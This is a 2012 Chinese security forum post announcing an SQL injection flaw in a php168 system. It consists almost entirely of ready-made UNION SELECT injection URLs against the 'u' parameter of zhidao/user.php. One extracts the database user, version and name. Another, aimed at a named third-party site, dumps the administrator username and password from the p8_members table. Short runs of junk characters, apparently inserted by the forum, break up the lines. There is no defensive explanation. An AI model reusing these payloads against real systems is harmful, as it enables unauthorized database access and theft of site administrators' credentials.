找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3122|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--+ Q8 N' A0 y! G7 R! B! ~- t: h1 ?
                                                         ' b: f% Z$ I7 \: b3 h9 v- f
                                       0 o# i" I% B8 |6 i% n! y$ N" j

& c, o0 e/ N& o# ^6 @' B
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
& f$ s. _) l2 q; W; }                                                     - o, D! ]; Y; V) K9 v  i0 T; H5 m/ h
                                                                  
/ A. E& q0 P# {  K" o/ g2 J                                                        * u( t2 q5 T( t$ @0 }8 f) A5 W3 a' k2 z
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
, N  l' ^7 q/ @& ?( A
( m. d7 ^( a% r" F! n6 k. v6 Q7 w/ H; c# P, T0 M8 `9 B

0 _: u3 ]; O& L; C                                                            ! L4 {5 ^- J! y& E- J7 M1 a; w
4 r5 [$ x- y- Q3 \
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--+ R, s7 [8 h7 P. Y0 C1 V7 m

/ {7 W. ~2 a4 f( Y& _# ?2 w% [, R1 m: s

5 t) E9 A1 j7 u9 `5 C( K( L, R                                                                    
3 D. t; z. {& a% W# g! {  G

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表